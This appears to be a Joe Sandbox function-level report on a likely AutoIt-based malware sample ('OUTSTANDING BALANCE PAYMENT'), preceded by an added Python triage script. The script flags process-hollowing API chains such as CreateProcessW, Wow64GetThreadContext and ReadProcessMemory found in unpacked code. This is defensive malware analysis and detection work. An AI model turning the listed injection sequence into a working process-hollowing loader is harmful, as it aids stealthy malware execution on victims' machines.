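Two entries in this listing are the ones a triage analyst would want to pull out mechanically: the function at 01225000 that chains CreateProcessW, Wow64GetThreadContext and a 4-byte ReadProcessMemory from a memory region the report marks as not backed by a PE image, and the GetTempFileNameW call with the `aut` prefix that matches the "compiled AutoIt script" verdict. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses per-function API lines in the report's own format into records, maps the names onto RunPE/process-hollowing API families, and flags the two patterns. The three sample entries are copied from this listing; the family table and the "create + get-context + read-or-write" threshold are my assumptions about a minimal hollowing sequence, and a 4-byte read is consistent with fetching the target's PEB image base but the listing alone does not prove what was read.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line from a Joe Sandbox per-function entry, e.g.
#   "• CreateProcessW.KERNELBASE(?,00000000), ref: 01227263"
#   "• __getstream.LIBCMT ref: 002A34FE"
#   "  • Part of subcall function 002851AF: _memset.LIBCMT ref: 0028522F"
API_LINE = re.compile(
    r"^\s*•\s*(?P<nested>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "Memory Dump Source" line: 'based on PE' says whether the code sits in a
# mapped image or in a non-image region (unpacked or injected code).
SOURCE_LINE = re.compile(r"based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    nested: bool  # True for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    backed_by_pe: Optional[bool] = None


def parse_entry(lines):
    """Parse one function entry (its 'APIs' list plus the 'Memory Dump
    Source' line) into a FunctionEntry."""
    entry = FunctionEntry()
    for line in lines:
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            args = [a for a in raw.split(",") if a != ""]
            entry.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                       int(m.group("ref"), 16),
                                       m.group("nested") is not None))
            continue
        s = SOURCE_LINE.search(line)
        if s:
            entry.backed_by_pe = s.group("pe").lower() == "true"
    return entry


# API families of a RunPE / process-hollowing sequence (assumed table).
# This sample's entry hits only the first three in one function, so the
# check treats create + get-context + (read or write) as the minimum.
RUNPE_FAMILIES = {
    "create":  {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "get_ctx": {"GetThreadContext", "Wow64GetThreadContext"},
    "read":    {"ReadProcessMemory", "NtReadVirtualMemory"},
    "write":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "set_ctx": {"SetThreadContext", "Wow64SetThreadContext"},
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}


def runpe_families_hit(entry):
    names = {c.name for c in entry.calls}
    return sorted(f for f, apis in RUNPE_FAMILIES.items() if names & apis)


def assess(entry):
    """Indicators a triage analyst would pull from one function entry."""
    fam = runpe_families_hit(entry)
    hollowing = "create" in fam and "get_ctx" in fam and bool({"read", "write"} & set(fam))
    # The AutoIt runtime names its temp files with the prefix "aut"; a
    # GetTempFileNameW using that prefix is consistent with the report's
    # "likely a compiled AutoIt script" verdict.
    autoit_tmp = any(c.name == "GetTempFileNameW" and "aut" in c.args for c in entry.calls)
    return {
        "runpe_families": fam,
        "hollowing_suspect": hollowing,
        # Injection code living outside any PE image is the unpacked-stage
        # pattern: the on-disk stub never imports these APIs itself.
        "injection_from_unpacked_code": hollowing and entry.backed_by_pe is False,
        "autoit_tempfile": autoit_tmp,
    }


# Constructed input: copied from this report's function listing (the
# injection function at 01225000, the AutoIt temp-file helper, and a CRT
# helper that must not trigger anything).
HOLLOWING_ENTRY = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 01227263
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012272F9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0122731B
• Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
""".splitlines()
TEMPFILE_ENTRY = """\
• GetTempPathW.KERNEL32(00000104,?), ref: 002CC72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002CC746
• Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
""".splitlines()
CRT_ENTRY = """\
• __getstream.LIBCMT ref: 002A34FE
  • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
• @_EH4_CallFilterFunc@8.LIBCMT ref: 002A3539
• __wopenfile.LIBCMT ref: 002A3549
""".splitlines()

if __name__ == "__main__":
    for label, lines in (("hollowing", HOLLOWING_ENTRY),
                         ("tempfile", TEMPFILE_ENTRY), ("crt", CRT_ENTRY)):
        print(label, assess(parse_entry(lines)))
```

Running it over a whole report is a matter of splitting the listing at each "APIs" header and feeding every chunk to `parse_entry`; the `injection_from_unpacked_code` flag is the one worth surfacing first, since it ties the injection primitives to a region the sandbox could not attribute to the on-disk image.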
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 632bd1729051d8372a0d95ee4bc4ab9126c5789590f68a385c036fc81561aeb1
                                                                  • Instruction ID: 7169346a8f8a0d051b4567cd8af3788436e21c8564d3c8f7c25d31ce6a0f71c2
                                                                  • Opcode Fuzzy Hash: 632bd1729051d8372a0d95ee4bc4ab9126c5789590f68a385c036fc81561aeb1
                                                                  • Instruction Fuzzy Hash: 86F179716143019FCB10DF24C981B5AB7E5BF88318F14892EF99A9B392D770E955CF82
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00285022
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002850CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell__memset
                                                                  • String ID:
                                                                  • API String ID: 928536360-0
                                                                  • Opcode ID: c400d7f85d2a0ff8dc34731a97037e7571309d97f24c8983b685437056832807
                                                                  • Instruction ID: d0b3129eba2a7d0dc8824acbbe7c5c3c625b7bc99af0ff4d39eafb1b993bec49
                                                                  • Opcode Fuzzy Hash: c400d7f85d2a0ff8dc34731a97037e7571309d97f24c8983b685437056832807
                                                                  • Instruction Fuzzy Hash: AA31C5B4515B11CFC321EF64D845697BBE8FF49304F00092EF59A87281E7716994CB92
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A81C2: __NMSG_WRITE.LIBCMT ref: 002A81E9
                                                                    • Part of subcall function 002A81C2: __NMSG_WRITE.LIBCMT ref: 002A81F3
                                                                  • __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A821F: GetModuleFileNameW.KERNEL32(00000000,00340312,00000104,00000000,00000001,00000000), ref: 002A82B1
                                                                    • Part of subcall function 002A821F: ___crtMessageBoxW.LIBCMT ref: 002A835F
                                                                    • Part of subcall function 002A1145: ___crtCorExitProcess.LIBCMT ref: 002A114B
                                                                    • Part of subcall function 002A1145: ExitProcess.KERNEL32 ref: 002A1154
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: dc4a51572c5aa99244ae6bda8c6aad03f2690c62200c49169e84f99590dfa1a3
                                                                  • Instruction ID: 85784c086c0c72b1fc438f1a0ac76283eeec8cb4948eac6bd3c0834d15762b52
                                                                  • Opcode Fuzzy Hash: dc4a51572c5aa99244ae6bda8c6aad03f2690c62200c49169e84f99590dfa1a3
                                                                  • Instruction Fuzzy Hash: 660196353753039BE6167B74EC52B6B33489B83760F210026F5059A191DFF09D204A64
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002CC385,?,?,?,?,?,00000004), ref: 002CC6F2
                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002CC708
                                                                  • CloseHandle.KERNEL32(00000000,?,002CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002CC70F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  • Opcode ID: 1e3c233609a5142dea4e0113716ce9a2d48aa0b7b26f8229c5c596572bddf73e
                                                                  • Instruction ID: bad919a78c430a0e53aff768b513d0e25be92aa8ea66be0307909cd32688a792
                                                                  • Opcode Fuzzy Hash: 1e3c233609a5142dea4e0113716ce9a2d48aa0b7b26f8229c5c596572bddf73e
                                                                  • Instruction Fuzzy Hash: 72E08632141214B7D7221F94AC1AFCA7F5CEB05760F104211FB54690E097B125218798
                                                                  APIs
                                                                  • _free.LIBCMT ref: 002CBB72
                                                                    • Part of subcall function 002A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,002A7A85), ref: 002A1CB1
                                                                    • Part of subcall function 002A1C9D: GetLastError.KERNEL32(00000000,?,002A7A85), ref: 002A1CC3
                                                                  • _free.LIBCMT ref: 002CBB83
                                                                  • _free.LIBCMT ref: 002CBB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                  • Instruction ID: 5f662cd75e7a8c189539484730abd5f324ae23da96ba6985aa882dea20fea658
                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                  • Instruction Fuzzy Hash: E0E0C2A162070243CA2069786E45FB313CC0F05331F04090EB819E314ACF20EC7088B4
                                                                  APIs
                                                                    • Part of subcall function 002822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002824F1), ref: 00282303
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002825A1
                                                                  • CoInitialize.OLE32(00000000), ref: 00282618
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002F503A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 3815369404-0
                                                                  • Opcode ID: 9cc5c2f4908b5546e21827efa7b5c5b059aed7828356871c1b4faf651219dc73
                                                                  • Instruction ID: 6bef4c3e49d67fc3b94f9ad2a421cddcc6259abbe578b41a04551f822b2f3fce
                                                                  • Opcode Fuzzy Hash: 9cc5c2f4908b5546e21827efa7b5c5b059aed7828356871c1b4faf651219dc73
                                                                  • Instruction Fuzzy Hash: 9871AEBC952A418BC306EF5AE990495BBECBB5A344B804A6ED109CF7B1DFB06494CF14
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 00283A73
                                                                    • Part of subcall function 002A1405: __lock.LIBCMT ref: 002A140B
                                                                    • Part of subcall function 00283ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00283AF3
                                                                    • Part of subcall function 00283ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00283B08
                                                                    • Part of subcall function 00283D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00283AA3,?), ref: 00283D45
                                                                    • Part of subcall function 00283D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00283AA3,?), ref: 00283D57
                                                                    • Part of subcall function 00283D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00341148,00341130,?,?,?,?,00283AA3,?), ref: 00283DC8
                                                                    • Part of subcall function 00283D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00283AA3,?), ref: 00283E48
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00283AB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 924797094-0
                                                                  • Opcode ID: 7350eb3cde508afe8aaebd4b5536c9e167293059d158d124f2e5883ecc5f3479
                                                                  • Instruction ID: bafa969f553c7fa454c736f41e10ca9e4dabf0a1cfffbdc1b471257249abe255
                                                                  • Opcode Fuzzy Hash: 7350eb3cde508afe8aaebd4b5536c9e167293059d158d124f2e5883ecc5f3479
                                                                  • Instruction Fuzzy Hash: 1411FD749143409BC301EF69E80590AFBE8EF86B10F00891FF4848B2A1CF70A5A4CF92
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 002AEA29
                                                                  • __close_nolock.LIBCMT ref: 002AEA42
                                                                    • Part of subcall function 002A7BDA: __getptd_noexit.LIBCMT ref: 002A7BDA
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                  • String ID:
                                                                  • API String ID: 1046115767-0
                                                                  • Opcode ID: 4bc41d5bbddac539e0f5262f41c31c1590e0a9ec05284f9624b70192a1cc370b
                                                                  • Instruction ID: 67fd2c8fcc1833b847108f2750ec3c2a76e755fae7cca59b5a82af0b416e018d
                                                                  • Opcode Fuzzy Hash: 4bc41d5bbddac539e0f5262f41c31c1590e0a9ec05284f9624b70192a1cc370b
                                                                  • Instruction Fuzzy Hash: DD11CE729396109FDB12BF68D8423593A616F83331F2B4740E4305F1E3CFB498228EA5
                                                                  APIs
                                                                    • Part of subcall function 002A395C: __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A395C: __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A395C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  • std::exception::exception.LIBCMT ref: 0029F51E
                                                                  • __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                    • Part of subcall function 002A6805: RaiseException.KERNEL32(?,?,0000000E,00336A30,?,?,?,0029F538,0000000E,00336A30,?,00000001), ref: 002A6856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: 4163186c127e4baa4ddb7f544c40c74f6feb003f1173367870313c8f844b333f
                                                                  • Instruction ID: 56ed46a6210e7bb6ce9d423d1627f14b4569661d1d682a475132de76b59058d0
                                                                  • Opcode Fuzzy Hash: 4163186c127e4baa4ddb7f544c40c74f6feb003f1173367870313c8f844b333f
                                                                  • Instruction Fuzzy Hash: 49F0223112020EABCB41BF9CDD129DE77ECAF01314FA48036FA08D2081CFB0D6608BA5
                                                                  APIs
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __lock_file.LIBCMT ref: 002A3629
                                                                    • Part of subcall function 002A4E1C: __lock.LIBCMT ref: 002A4E3F
                                                                  • __fclose_nolock.LIBCMT ref: 002A3634
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 66165a3f85b13b3a9f149c29134dd34f172c726db198fe8e6c8b9eca53807764
                                                                  • Instruction ID: 1b1b96826a8e972f563e1ef9ecd897d6b88cc31aee0cf6770695c52a9516ed90
                                                                  • Opcode Fuzzy Hash: 66165a3f85b13b3a9f149c29134dd34f172c726db198fe8e6c8b9eca53807764
                                                                  • Instruction Fuzzy Hash: 33F02B31C20200ABD711FF65880675EB6A46F43730F298108F420AB2C1CF7C86259F59
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01227263
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012272F9
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0122731B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction ID: 548b66b87e872a28e138727a763637f6b96d02ac0be225e25ac90f0fc82e0594
                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction Fuzzy Hash: 6912BF24E28658C6EB24DF64D8507DEB232EF68300F1051E9D10DEB7A5E77A4E81CF5A
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028E959
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: 9dfbf4a14d7b46e5f0ece3bc26cde004ce95bad01a8dc996e915d79ba5b43d2e
                                                                  • Instruction ID: e9ec7d3dc29881a853f059103a103c049db2faa47e6b825f1a0c471e094ba99d
                                                                  • Opcode Fuzzy Hash: 9dfbf4a14d7b46e5f0ece3bc26cde004ce95bad01a8dc996e915d79ba5b43d2e
                                                                  • Instruction Fuzzy Hash: 00817A748197858FEF26DF24C48436ABBD0BF12304F0945BEDE858F2A2D7749894CB42
                                                                  APIs
                                                                  • __flush.LIBCMT ref: 002A2A0B
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __flush__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 4101623367-0
                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction ID: a9ce88dedca19ad6152637cb382936475ba01c91cb1b58aac354b8e5744eb2b0
                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction Fuzzy Hash: BA418031620707DFDB288FADC8805AF7BA6AF46760F24852DE855C7241EF70DD698B40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 24e6574b68826d2333d1eed18eefbdb987117191657320e6110472f7568d49e6
